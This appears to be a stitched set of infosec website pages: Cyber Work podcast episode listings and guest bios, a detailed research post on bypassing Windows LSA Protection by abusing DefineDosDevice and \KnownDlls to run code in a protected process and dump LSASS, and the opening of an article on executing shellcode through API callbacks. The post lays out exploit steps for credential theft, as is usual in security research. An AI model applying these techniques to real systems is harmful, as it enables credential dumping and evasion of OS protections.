Jeff Schmidt, VP and Chief Cyber Security Innovator at Covail is an accomplished cybersecurity expert with a background in security and risk management. He founded JAS Global Advisors LLC, a security consulting firm in Chicago, and Authis, a provider of innovative risk-managed identity services for the financial sector. Jeff is a board member for Delta Risk LLC. In 1998, he worked with the FBI to create the InfraGard program, receiving commendations from the Attorney General and the Director of the FBI. He is an adjunct professor of systems security engineering at the Stevens Institute of Technology and a Zurich Cyber Risk Fellow, Cyber Statecraft Initiative, at The Atlantic Council. Jeff received a Bachelor of Science in computer information systems and an MBA from the Fisher College of Business at The Ohio State University.

Jeff came to us with an intriguing topic. He proposes what he calls a Detect, Defend, and Respond Posture in Cybersecurity, and postulates that cybersecurity can learn lessons from “the mature sciences of physical security and fire protection.” No matter how you’re securing your system now, there’s often room for improvement, and always room for taking in new ideas, so let’s take a closer look!


Supporting economic advancement among women in cybersecurity | Guest Christina Van Houten

Christina Van Houten talks about Women@Work and women in cybersecurity on this week's episode. We discuss tactics for bringing more women and diverse candidates into cybersecurity, the importance of a well-balanced and skills-diverse team, and how the work of Chief Strategy Officer is like an ever-evolving game of Tetris! 

0:00 - Intro
2:30 - Van Houten's origin story
4:13 - Strategies cybersecurity was lacking
7:05 - Accomplishments that helped bolster her career
13:46 - Average day as chief strategy officer
18:03 - Entering cybersecurity in different ways
20:37 - Women@Work and trying to help
26:27 - Bringing more women into cybersecurity
29:20 - Making careers accessible to women
34:14 - Diversifying upper management 
36:22 - Success stories mentoring women
41:01 - Men@Work book and men in cybersecurity
46:33 - Roadblocks women in cybersecurity face
50:47 - Projects from Mimecast
54:37 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Christina Van Houten is a veteran of the enterprise technology industry, having spent two decades with some of the world’s largest firms, including Oracle, IBM and Infor Global Solutions as well as Netezza and ProfitLogic, the entrepreneurial companies that were acquired by them. Currently, Christina is chief strategy officer for Mimecast, a global leader in cybersecurity, where she leads product management, market strategy, corporate development, and M&A. She also serves on the board of directors for TechTarget and has been involved as an advisory board member of several emerging technology firms. In 2017, Christina launched Women@Work, a resource platform dedicated to the economic advancement and self-reliance of women and girls around the world.


Bypassing LSA Protection in Userland

In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection).

Introduction

I was doing some research on Protected Processes when I stumbled upon the following blog post: Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege. This post was written by James Forshaw on Project Zero’s blog in August 2018. As the title implies, the objective was to discuss a particular privilege escalation trick, not a PPL bypass. However, the following sentence immediately caught my eye:

Abusing the DefineDosDevice API actually has a second use, it’s an Administrator to Protected Process Light (PPL) bypass.

As far as I know, all the public tools for bypassing PPL that have been released so far involve the use of a driver in order to execute arbitrary code in the Kernel (with the exception of pypykatz as I mentioned in my previous post). In his blog post though, James Forshaw casually gave us a Userland bypass trick on a plate, and it seems it went quite unnoticed by the pentesting community.

The objective of this post is to discuss this technique in more detail. I will first recap some key concepts behind PPL processes and explain one of the major differences between a PP (Protected Process) and a PPL (Protected Process Light). Then, we will see how this slight difference can be exploited as an administrator. Finally, I will introduce the tool I developed to leverage this vulnerability and dump the memory of any PPL without using any Kernel code.

Background

I already laid down all the core principles behind PP(L)s on my personal blog here: Do You Really Know About LSA Protection (RunAsPPL)?. So, I would suggest reading this post first but here is a TL;DR.

PP(L) Concepts – TL;DR

When the PP model was first introduced with Windows Vista, a process was either protected or unprotected. Then, beginning with Windows 8.1, the PPL model extended this concept and introduced protection levels. The immediate consequence is that some PP(L)s can now be more protected than others. The most basic rule is that an unprotected process can open a protected process only with a very restricted set of access flags, such as PROCESS_QUERY_LIMITED_INFORMATION. If it requests a higher level of access, the system will return an Access is Denied error.

For PP(L)s, it’s a bit more complicated. The level of access they can request depends on their own level of protection. This protection level is partly determined by a special EKU field in the file’s digital certificate. When a protected process is created, the protection information is stored in a special value in the EPROCESS Kernel structure. This value stores the protection level (PP or PPL) and the signer type (e.g.: Antimalware, Lsa, WinTcb, etc.). The signer type establishes a sort of hierarchy between PP(L)s. Here are the basic rules that apply to PP(L)s:

  • A PP can open a PP or a PPL with full access if its signer type is greater or equal.
  • A PPL can open a PPL with full access if its signer type is greater or equal.
  • A PPL cannot open a PP with full access, regardless of its signer type.

For example, when LSA Protection is enabled, lsass.exe is executed as a PPL, and you will observe the following protection level with Process Explorer: PsProtectedSignerLsa-Light. If you want to access its memory you will need to call OpenProcess and specify the PROCESS_VM_READ access flag. If the calling process is not protected, this call will immediately fail with an Access is Denied error, regardless of the user’s privileges. However, if the calling process were a PPL with a higher level (WinTcb for instance), the same call would succeed (as long as the user has the appropriate privileges obviously). As you will have understood, if we are able to create such a process and execute arbitrary code inside it, we will be able to access LSASS even if LSA Protection is enabled. The question is: can we achieve this goal without using any Kernel code?
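To make this failure mode concrete, here is a minimal sketch of the call described above (assumptions: RunAsPPL is enabled, and the PID of lsass.exe has been looked up beforehand; the PID value below is purely illustrative):

```c
#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Illustrative value: look up the real PID of lsass.exe first
    DWORD lsassPid = 1234;

    // From an unprotected process, only limited access flags such as
    // PROCESS_QUERY_LIMITED_INFORMATION would succeed; PROCESS_VM_READ
    // is denied by the PP(L) model when LSA Protection is enabled.
    HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, lsassPid);
    if (hProcess == NULL) {
        if (GetLastError() == ERROR_ACCESS_DENIED)
            wprintf(L"Access is denied, regardless of our privileges\n");
    } else {
        // Would only happen if the caller were itself a sufficiently
        // privileged PPL (e.g. WinTcb signer type).
        CloseHandle(hProcess);
    }
    return 0;
}
```

Running this as an administrator, even with SeDebugPrivilege enabled, still hits the access-denied branch, which is precisely what makes the Userland bypass discussed below interesting.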

PP vs PPL

The PP(L) model effectively prevents an unprotected process from accessing protected processes with extended access rights using OpenProcess for example. This prevents simple memory access, but there is another aspect of this protection I did not mention. It also prevents unsigned DLLs from being loaded by these processes. This makes sense, otherwise the overall security model would be pointless as you could just use any form of DLL hijacking and inject arbitrary code into your own PPL process. This also explains why a particular attention should be paid to third-party authentication modules when enabling LSA Protection.

There is one exception to this rule though! And this is probably where the biggest difference between a PP and a PPL lies. If you know about the DLL search order on Windows, you know that, when a process is created, it first goes through the list of “Known DLLs”, then it continues with the application’s directory, the System directories and so on… In this search order, the “Known DLLs” step is a special one and is usually taken out of the equation for DLL hijacking exploits because a user has no control over it. In our case, though, this step is precisely the Achilles’ heel of PPL processes.

The “Known DLLs” are the DLLs that are most commonly loaded by Windows applications. Therefore, to increase the overall performance, they are preloaded in memory (i.e. they are cached). If you want to see the complete list of “Known DLLs”, you can use WinObj and take a look at the content of the \KnownDlls directory within the object manager.

WinObj – Known DLLs

Since these DLLs are already in memory, you should not see them if you use Process Monitor to check the file operations of a typical Windows application. Things are a bit different when it comes to Protected Processes though. I will take SgrmBroker.exe as an example here.

Known DLLs loaded by a Protected Process

As we can see in Process Explorer, SgrmBroker.exe was started as a Protected Process (PP). When the process starts, the very first DLLs that are loaded are kernel32.dll and KernelBase.dll, which are both… “Known DLLs”. Yes, in the case of a PP, even the “Known DLLs” are loaded from the disk, which implies that the digital signature of each file is always verified. However, if you do the same test with a PPL, you will not see these DLLs in Process Monitor, as a PPL behaves like a normal process in this regard.

This fact is particularly interesting because the digital signature of a DLL is only verified when the file is mapped, i.e. when a Section is created. This means that, if you are able to add an arbitrary entry to the \KnownDlls directory, you can then inject an arbitrary DLL and execute unsigned code in a PPL.

Adding an entry to \KnownDlls is easier said than done though because Microsoft already considered this attack vector. As explained by James Forshaw in his blog post, the \KnownDlls object directory is marked with a special Process Trust Label as you can see on the screenshot below.

KnownDlls directory Process Trust Label

As you may imagine, based on the name of the label, only protected processes that have a level higher than or equal to WinTcb – which is actually the highest level for PPLs – can request write access to this directory. But all is not lost as this is exactly where the clever trick found by JF comes into play.

MS-DOS Device Names

As mentioned in the introduction, the technique found by James Forshaw relies on the use of the API function DefineDosDevice, and involves some Windows internals that are not easy to grasp. Therefore, I will first recap some of these concepts here before dealing with the method itself.

DefineDosDevice?

Here is the prototype of the DefineDosDevice function:

BOOL DefineDosDeviceW(
  DWORD   dwFlags,
  LPCWSTR lpDeviceName,
  LPCWSTR lpTargetPath
);

As suggested by its name, the purpose of DefineDosDevice is literally to define MS-DOS device names. An MS-DOS device name is a symbolic link in the object manager with a name of the form \DosDevices\DEVICE_NAME (e.g.: \DosDevices\C:) as explained in the documentation. So, this function allows you to map an actual “Device” to a “DOS Device”. This is exactly what happens when you plug in an external drive or a USB key for example. The device is automatically assigned a drive letter, such as E:. You can get the corresponding mapping by invoking QueryDosDevice.

#include <windows.h>
#include <stdio.h>

// Resolve an MS-DOS device name (e.g. argv[1] = L"E:") to its NT device path
WCHAR path[MAX_PATH + 1];

if (QueryDosDevice(argv[1], path, MAX_PATH)) {
    wprintf(L"%ws -> %ws\n", argv[1], path);
}
Querying an MS-DOS device’s mapping

In the above example, the target device is \Device\HarddiskVolume5 and the MS-DOS device name is E:. But wait a minute, I said that an MS-DOS device name was of the form \DosDevices\DEVICE_NAME. So, this cannot be just a drive letter. No worries, there is an explanation. For both DefineDosDevice and QueryDosDevice, the \DosDevices\ part is implicit. These functions automatically prepend the “device name” with \??\. So, if you provide E: as the device name, they will use the NT path \??\E: internally. Even then, you will tell me that \??\ is still not \DosDevices\, and this would be a valid point. Once again, WinObj will help us solve this “mystery”. In the root directory of the object manager, we can see that \DosDevices is just a symbolic link that points to \??. As a result, \DosDevices\E: -> \??\E:, so we can consider them as the same thing. This symbolic link actually exists for legacy reasons because, in older versions of Windows, there was only one DOS device directory.

WinObj – DosDevices symbolic link
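Before going further, here is a minimal, benign sketch of the API pair in action (assumptions: run as an administrator; the device name MyDevice and the target volume are illustrative, not part of the exploit itself):

```c
#include <windows.h>
#include <stdio.h>

int main(void)
{
    WCHAR target[MAX_PATH + 1];

    // DDD_RAW_TARGET_PATH: treat lpTargetPath as a raw NT path, no conversion.
    // Internally, this creates the symbolic link \??\MyDevice.
    if (DefineDosDeviceW(DDD_RAW_TARGET_PATH, L"MyDevice",
                         L"\\Device\\HarddiskVolume1")) {

        // Read the mapping back, exactly as in the earlier example.
        if (QueryDosDeviceW(L"MyDevice", target, MAX_PATH))
            wprintf(L"MyDevice -> %ws\n", target);

        // Remove the mapping we just created.
        DefineDosDeviceW(DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION,
                         L"MyDevice", L"\\Device\\HarddiskVolume1");
    }
    return 0;
}
```

Note that nothing forces lpDeviceName to be a drive letter here, which is the property the rest of this post builds on.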

Local DOS Device Directories

The path prefix \??\ itself has a very special meaning. It represents the local DOS device directory of a user and therefore refers to different locations in the object manager, depending on the current user’s context. Concretely, \?? refers to the full path \Sessions\0\DosDevices\00000000-XXXXXXXX, where XXXXXXXX is the user’s logon authentication ID. There is one exception though, for NT AUTHORITY\SYSTEM, \?? refers to \GLOBAL??. This concept is very important so I will take two examples to illustrate it. The first one will be the USB key I used previously and the second one will be an SMB share I manually mount through the Explorer.

In the case of the USB key, we already saw that \??\E: was a symbolic link to \Device\HarddiskVolume5. As it was mounted by SYSTEM, this link should exist within \GLOBAL??\. Let’s verify that with WinObj.

WinObj – \GLOBAL??\E: symbolic link

Everything is fine! Now, let’s map an “SMB share” to a drive letter and see what happens.

Mapping a Network Drive

This time, the drive is mounted as the logged-on user, so \?? should refer to \Sessions\0\DosDevices\00000000-XXXXXXXX, but what is the value of XXXXXXXX? To find it, I will use Process Hacker and check the advanced properties of my explorer.exe process’ primary access token.

Process Hacker – Explorer’s token advanced properties

The authentication ID is 0x1abce so the symbolic link should have been created inside \Sessions\0\DosDevices\00000000-0001abce. Once again, let’s verify that with WinObj.

WinObj – SMB share symbolic link

There it is! The symbolic link was indeed created in this directory.

Why DefineDosDevice?

As we saw in the previous part, the device mapping operation consists of a simple symbolic link creation in the caller’s DOS device directory. Any user can do that as it affects only their session. But there is a problem, because low-privileged users can only create “Temporary” kernel objects, which are removed once all their handles have been closed. To solve this problem, the object must be marked as “Permanent”, but this requires a particular privilege (SeCreatePermanentPrivilege) which they do not have. So, this operation must be performed by a privileged service that has this capability.

The symbolic link is marked as “Permanent”

As outlined by JF in his blog post, DefineDosDevice is just a wrapper for an RPC method call. This method is exposed by the CSRSS service and is implemented in BaseSrvDefineDosDevice inside BASESRV.DLL. What is special about this service is that it runs as a PPL with the protection level WinTcb.

CSRSS service running as a PPL (WinTcb)

Although this is a requirement for our exploit, it is not the most interesting fact about DefineDosDevice. What is even more interesting is that the value of lpDeviceName is not sanitized. This means that you are not bound to provide a drive letter such as E:. We will see how we can leverage this to trick the CSRSS service into creating an arbitrary symbolic link in an arbitrary location such as \KnownDlls.

Exploiting DefineDosDevice

In this part, we will take a deep dive into the DefineDosDevice function. We will see what kind of weakness lies inside it and how we can exploit it to reach our goal.

The Inner Workings of DefineDosDevice

In his article, JF did all the heavy lifting as he reversed the BaseSrvDefineDosDevice function and provided us with the corresponding pseudo-code. You can check it out here. If you do so, you should note that there is a slight mistake at step 4, though: it should be CsrImpersonateClient(), not CsrRevertToSelf(). Anyway, rather than copy-pasting his code, I will try to provide a high-level overview using a diagram instead.

Overview of BaseSrvDefineDosDevice

In this flowchart, I highlighted some elements with different colors. The impersonation functions are in orange and the symbolic link creation steps are in blue. Finally, I highlighted the critical path we need to take in red.

First, we can see that the CSRSS service tries to open \??\DEVICE_NAME while impersonating the caller (i.e. the RPC client). The main objective is to delete the symbolic link first if it already exists. But there is more to it: the service also checks whether the symbolic link is “global”. For that purpose, an internal function, which is not represented here, simply checks whether the “real” path of the object starts with \GLOBAL??\. If so, impersonation is disabled for the rest of the execution and the service will not impersonate the client prior to the NtCreateSymbolicLinkObject() call, which means that the symbolic link will be created by the CSRSS service itself. Finally, if this operation succeeds, the service marks the object as “Permanent”, as I mentioned earlier.

A Vulnerability?

At this point you may have realized that there is a sort of TOCTOU (Time-of-Check Time-of-Use) vulnerability. The path used to open the symbolic link and the path used to create it are the same: \??\DEVICE_NAME. However, the “open” operation is always done while impersonating the user whereas the “create” operation might be done directly as SYSTEM if impersonation is disabled. And, if you remember what I explained earlier, you know that \?? represents a user’s local DOS device directory and therefore resolves to different paths depending on the user’s identity. So, although the same path is used in both cases, it may well refer to completely different locations in reality!

In order to exploit this behavior, we must solve the following challenge: we need to find a “device name” that resolves to a “global object” we control when the service impersonates the client. And this same “device name” must resolve to \KnownDlls\FOO.dll when impersonation is disabled. This sounds a bit tricky, but we will go through it step by step.

Let’s begin with the easiest part first. We need to determine a value for DEVICE_NAME in \??\DEVICE_NAME such that this path resolves to \KnownDlls\FOO.dll when the caller is SYSTEM. We also know that \?? resolves to \GLOBAL?? in this case.

If you check the content of the \GLOBAL??\ directory, you will see that there is a very convenient object inside it.

WinObj – The “real” GLOBALROOT

In this directory, the GLOBALROOT object is a symbolic link that points to an empty path. This means that a path such as \??\GLOBALROOT\ would translate to just \, which is the root of the object manager (hence the name “global root”). If we apply this principle to our “device name”, we know that \??\GLOBALROOT\KnownDlls\FOO.DLL would resolve to \KnownDlls\FOO.dll when the caller is SYSTEM. This is one part of the problem solved!

Now, we know that we should supply GLOBALROOT\KnownDlls\FOO.DLL as the “device name” for the DefineDosDevice function call (remember that \??\ will be automatically prepended to this value). If we want the CSRSS service to disable impersonation, we also know that the symbolic link object must be considered as “global” so its path must start with \GLOBAL??\. So, the question is: how do you transform a path such as \??\GLOBALROOT\KnownDlls\FOO.DLL into \GLOBAL??\KnownDlls\FOO.dll? The solution is actually quite straightforward as this is pretty much the very definition of a symbolic link! When the service impersonates the user, we know that \?? refers to the local DOS device directory of this particular user, so all you have to do is create a symbolic link such that \??\GLOBALROOT points to \GLOBAL??, and that’s it.

To summarize, when the path is opened by a user other than SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll

\Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\KnownDlls\FOO.dll

On the other hand, if the same path is opened by SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll

\GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll
-> \KnownDlls\FOO.dll

There is one last thing that needs to be taken care of. Before checking whether the object is “global” or not, it must first exist, otherwise the initial “open” operation would just fail. So, we need to make sure that \GLOBAL??\KnownDlls\FOO.dll is an existing symbolic link object prior to calling DefineDosDevice.

WinObj – Permissions of \GLOBAL??

There is a slight issue here. Administrators cannot create objects or even directories within \GLOBAL??. This is not really a problem; this just adds an extra step to our exploit as we will have to temporarily elevate to SYSTEM first. As SYSTEM, we will be able to first create a fake KnownDlls directory inside \GLOBAL??\ and then create a dummy symbolic link object inside it with the name of the DLL we want to hijack.

The Full Exploit

There is a lot of information to digest so, here is a short recap of the exploit steps before we discuss the last considerations. In this list, we assume we are executing the exploit as an administrator.

  1. Elevate to SYSTEM, otherwise we will not be able to create objects inside \GLOBAL??.
  2. Create the object directory \GLOBAL??\KnownDlls to mimic the actual \KnownDlls directory.
  3. Create the symbolic link \GLOBAL??\KnownDlls\FOO.dll, where FOO.dll is the name of the DLL we want to hijack. Remember that what matters is the name of the link itself, not its target.
  4. Drop the SYSTEM privileges and revert to our administrator user context.
  5. Create a symbolic link in the current user’s DOS device directory called GLOBALROOT and pointing to \GLOBAL??. This step must not be done as SYSTEM because we want to create a fake GLOBALROOT link inside our own DOS directory.
  6. This is the centerpiece of this exploit. Call DefineDosDevice with the value GLOBALROOT\KnownDlls\FOO.dll as the device name. The target path of this device is the location of the DLL but I will get to that in the next part.

Here is what happens inside the CSRSS service at the final step. It first receives the value GLOBALROOT\KnownDlls\FOO.dll and prepends it with \??\ so this yields the device name \??\GLOBALROOT\KnownDlls\FOO.dll. Then, it tries to open the corresponding symbolic link object while impersonating the client.

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\KnownDlls\FOO.dll

Since the object exists, it will check if it’s global. As you can see, the “real” path of the object starts with \GLOBAL??\ so it’s indeed considered global, and impersonation is disabled for the rest of the execution. The current link is deleted and a new one is created, but this time, the RPC client is not impersonated, so the operation is done in the context of the CSRSS service itself as SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll
-> \KnownDlls\FOO.dll

Here we go! The service creates the symbolic link \KnownDlls\FOO.dll with a target path we control.

DLL Hijacking through Known DLLs

Now that we know how to add an arbitrary entry to the \KnownDlls directory, we should come back to our original problem, and our exploit constraints.

Which DLL to Hijack?

We want to execute arbitrary code inside a PPL, and ideally with the signer type “WinTcb”. So, we need to find a suitable executable candidate first. On Windows 10, four built-in binaries can be executed with such a level of protection as far as I know: wininit.exe, services.exe, smss.exe and csrss.exe. smss.exe and csrss.exe cannot be executed in Win32 mode so we can eliminate them. I did a few tests with wininit.exe but letting this binary run as an administrator with debug privileges is a bad idea. Indeed, there is a high chance it will mark itself as a Critical Process, meaning that when it terminates, the system will likely crash with a BSOD.

This leaves us with only one potential candidate: services.exe. As it turns out, this is the perfect candidate for our purpose. Its main function is very easy to decompile and understand. Here is the corresponding pseudo-code.

int wmain()
{
    HANDLE hEvent;
    hEvent = OpenEvent(SYNCHRONIZE, FALSE, L"Global\\SC_AutoStartComplete");
    if (hEvent) {
        CloseHandle(hEvent);
    } else {
        RtlSetProcessIsCritical(TRUE, NULL, FALSE);
        if (NT_SUCCESS(RtlInitializeCriticalSection(&CriticalSection)))
            SvcctrlMain();
    }
    return 0;
}

It first tries to open a global Event object. If it succeeds, the handle is closed, and the process terminates. The actual main function SvcctrlMain() is executed only if this Event object does not exist. This makes sense: this simple synchronization mechanism ensures services.exe is not executed twice, which is perfect for our use case as we don’t want to mess with the Service Control Manager (services.exe is the image file used by the SCM).

WinObj – SC_AutoStartComplete global Event

Now, in order to get a first glimpse at the DLLs that are loaded by services.exe, we can use Process Monitor with a few filters.

Process Monitor – DLLs loaded by services.exe

From this output, we know that services.exe loads three DLLs (which are not Known DLLs), but this information, on its own, is not sufficient. We also need to find out which functions are imported, so we have to take a look at the PE’s import table.

IDA – Import table of services.exe

Here, we can see that only one function is imported from dpapi.dll: CryptResetMachineCredentials. Therefore, this is the simplest DLL to hijack. We just have to remember that we will have to export this function, otherwise our crafted DLL will not be loaded.

But is it that simple? The short answer is “no”. After doing some testing on various installations of Windows, I realized that this behavior was not consistent. On some versions of Windows 10, dpapi.dll is not loaded at all, for some reason. In addition, the DLLs that are imported by services.exe on Windows 8.1 are completely different. In the end, I had to take all these differences into account in order to build a tool that works on all the recent versions of Windows (including the Server editions) but you get the overall idea.

DLL File Mapping

In the previous parts, we saw how we could trick the CSRSS service into creating an arbitrary symbolic link object in \KnownDlls but I intentionally omitted an essential part: the target path of the link.

A symbolic link can virtually point to any kind of object in the object manager but, in our case, we have to mimic the behavior of a library being loaded as a Known DLL. This means that the target must be a Section object, rather than the DLL file path for example.

As we saw earlier, “Known DLLs” are Section objects which are stored in the object directory \KnownDlls and this is also the first location in the DLL search order. So, if a program loads a DLL named FOO.dll and the Section object \KnownDlls\FOO.dll exists, then the loader will use this image rather than mapping the file again. In our case, we have to do this step manually. The term “manually” is a bit inappropriate though as we do not really have to map the file ourselves if we do this in the “legitimate way”.

A Section object can be created by invoking NtCreateSection. This native API function requires an AllocationAttributes argument, which is usually set to SEC_COMMIT or SEC_IMAGE. When SEC_IMAGE is set, we can specify that we want to map a previously opened file as an executable image file. Therefore, it will be properly and automatically mapped into memory. But this means that we have to embed a DLL, write it to the disk, open it with CreateFile to get a handle on the file and finally invoke NtCreateSection. For a Proof-of-Concept, this is fine, but I wanted to go the extra mile and find a more elegant solution.

Another approach would consist in doing everything in memory. Similar to the famous Process Hollowing technique, we would have to create a Section object with enough memory space to store the content of our DLL’s image, then parse the NT headers to identify each section inside the PE and map them appropriately, which is what the loader does. This is a rather tedious process and I did not want to go this far. However, while doing my research, I stumbled upon a very interesting blog post about “DLL Hollowing” by @_ForrestOrr. In his Proof-of-Concept he made use of Transactional NTFS (a.k.a TxF) to replace the content of an existing DLL file with his own payload without really modifying it on disk. The only requirement is that you must have write permissions on the target file.

In our case, we assume that we have admin privileges, so this is perfect. We can open a DLL in the System directory as a transaction, replace its content with our payload DLL and finally use the opened handle in the NtCreateSection API function call with the flag SEC_IMAGE. But I did say that we still need to have write permissions on the target file, even though we don’t really modify the file itself. This is a problem because system files are owned by TrustedInstaller, aren’t they? Since we assume we have admin privileges, we could well elevate to TrustedInstaller but there is a simpler solution. It turns out some (DLL) files within C:\Windows\System32\ are actually owned by SYSTEM, so we just have to search this directory for a proper candidate. We should also make sure that its size is large enough so that we can replace its content with our own payload.

Exploiting as SYSTEM?

In the exploit part, I insisted on the fact that the DefineDosDevice API function must be called as any user other than SYSTEM, otherwise the whole “trick” would not work. But what if we are already SYSTEM and we don’t have an administrator account? We could create a temporary local administrator account, but this would be quite lame. A better thing to do is simply impersonate an existing user. For instance, we can impersonate LOCAL SERVICE or NETWORK SERVICE, as they both have their own DOS device directory.

Assuming we have “debug” and “impersonate” privileges, we can list the current processes, find one that runs as LOCAL SERVICE, duplicate the primary token and temporarily impersonate this user. It’s as simple as that.

Whether we execute the exploit as SYSTEM or as an administrator, we will have to go back and forth between two identities without losing track of things.

Conclusion

In this post, we saw how a seemingly benign API function could be leveraged by an administrator to eventually inject arbitrary code into a PPL at the highest protection level using some very clever tricks. I implemented this technique in a new tool – PPLdump – in reference to ProcDump. Assuming you have administrator or SYSTEM privileges, it allows you to dump the memory of any PPL, including LSASS when LSA Protection is enabled.

This “vulnerability”, initially published in 2018, is still not patched. If you wonder why, you can check out the Windows Security Servicing Criteria section in the Microsoft Bug Bounty program. You will see that even a non-admin to PPL bypass is not a serviceable issue.

Windows Security Servicing Criteria

By implementing this technique in a standalone tool, I learned a lot about some Windows Internals which I did not really have the opportunity to tackle before. In turn, I covered a lot of those aspects in this blog post. But this would certainly not have been possible if great security researchers such as James Forshaw (@tiraniddo) did not share their knowledge through their various publications. So, once again, I want to say a big thank you to him.

If you want to read the original publication or if you want to learn more about “DLL Hollowing”, you can check out the following resources.

  • @tiraniddo – Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege – link
  • @_ForrestOrr – Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing – link

Supply-chain security and servant leadership | Guest Manish Gupta

In this episode we explore supply-chain security with Manish Gupta. We’re going to learn about risks and cyberattacks related to the continuous integration/continuous deployment or CI/CD pipeline, which, given high-profile attacks like SolarWinds, will give us plenty to discuss this week!

0:00 - Intro
2:21 - Manish's origin story
4:58 - Major career stepping stones
8:45 - Lessons when ahead of the curve
11:21 - Average day as a servant leader CEO
14:54 - Concerns with supply chain security
21:22 - Federal supply chain action
26:20 - What supply chain policy should focus on
28:40 - Skills needed for supply chain jobs
32:48 - What should be on my resume?
34:03 - Showing supply chain aptitude
36:04 - Future projects
38:29 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Manish Gupta is the founder and CEO of ShiftLeft, an innovator in automated application security and the leader in application security for developers. He previously served as the chief product and strategy officer at FireEye, where he helped grow the company from approximately $70 million to more than $700 million in revenue, growing the product portfolio from two to more than 20 products. Before that he was vice president of product management for Cisco’s $2 billion security portfolio. He also served as a vice president/general manager at McAfee and iPolicy Networks.

Manish has an MBA from the Kellogg Graduate School of Management, MS in engineering from the University of Maryland and a BS in engineering from the Delhi College of Engineering.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


What does a digital forensic investigator do in the government? | Guest Ondrej Krehel

Digital forensics professional Ondrej Krehel talks about the work of digital forensics in federal and government locations, the things he learned during a months-long attempt at decrypting a well-secured Swiss bank file and why finishing the research beats any degree you could ever have.

0:00 - Intro
2:11 - Ondrej's cybersecurity journal
5:33 - Career stepping stones
9:55 - The Swiss job
16:02 - Chasing the learning and experience
20:01 - Digital forensics on a government and federal scale
28:07 - Forensics collaboration on a case
30:46 - Favorite work stories
31:33 - How to improve infrastructure security
36:01 - Skills needed to enter digital forensics in government
41:31 - Unheard activities of digital forensics
43:48 - Where do I get work experience?
47:05 - Tips for digital forensic job hunters
52:19 - Work with LIFARS
57:50 - Outro

Have you seen our new, hands-on training series Cyber Work Applied? Tune in every other week as expert Infosec instructors teach you a new cybersecurity skill and show you how that skill applies to real-world scenarios. You’ll learn how to carry out different cyberattacks, practice using common cybersecurity tools, follow along with walkthroughs of how major breaches occurred, and more. And it's free!

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Ondrej Krehel is a digital forensics and cybersecurity professional. His background includes time with special cyber operations, cyber warfare and offensive missions, as well as serving as a court expert witness. His forensic investigation matters have received attention from Forbes, CNN, NBC, BBC, ABC, Reuters, The Wall Street Journal and The New York Times.

As you can see, Ondrej has a deep background in digital forensics and ethical hacking. He tells us about time spent as a guest lecturer at the FBI Training Academy, the current state of digital forensics in a federal and government context and gives us some info about how that realm differs from similar work done in for-profit or private companies.


Your beginner cybersecurity career questions, answered! | Cyber Work Live

Whether you’re looking for first-time work in the cybersecurity field, still studying the basics or considering a career change, you might feel overwhelmed with choices. How do you know you have the right knowledge? How do you make yourself stand out in the resume pile? How do you get jobs that require experience without having any experience?

Join a panel of past Cyber Work Podcast guests including Gene Yoo, CEO of Resecurity, and the expert brought in by Sony to triage the 2014 hack; Mari Galloway, co-founder of Women’s Society of Cyberjutsu and Victor “Vic” Malloy, General Manager, CyberTexas.

They provide top-notch cybersecurity career advice for novices, including questions from Cyber Work Live viewers.

0:00 - Intro
3:38 - I'm tech-savvy. Where do I begin?
10:55 - Figuring out the field for you
19:16 - Returning to cybersecurity at 68
23:30 - Finding a cybersecurity mentor
29:39 - Non-technical roles in the industry
36:21 - Breaking into the industry
43:46 - Standout resume and interview
51:31 - Is a certification necessary?
56:50 - Related skills beginners should have
1:04:35 - Outro

This episode was recorded live on March 25, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast


Executing Shellcode via Callbacks

What is a Callback Function?

In simple terms, a callback function is a function that is called through a function pointer. When we pass a function pointer as the parameter where a callback function is expected, and that pointer is later used to invoke the function it points to, a callback is said to be made. This mechanism can be abused to pass shellcode instead of a legitimate function pointer. The technique has been around for a long time, and there are many Win32 APIs we can use to execute shellcode this way. This article covers a few APIs that I have tested and confirmed working on Windows 10.

Analyzing an API

For example, let’s take the function EnumWindows from user32.dll. The first parameter lpEnumFunc is a pointer to a callback function of type WNDENUMPROC.

BOOL EnumWindows(
  WNDENUMPROC lpEnumFunc,
  LPARAM      lParam
);

The function passes the parameters to an internal function called EnumWindowsWorker.

The first parameter, which is the callback function pointer, is invoked inside this function, making it possible to pass position-independent shellcode instead.



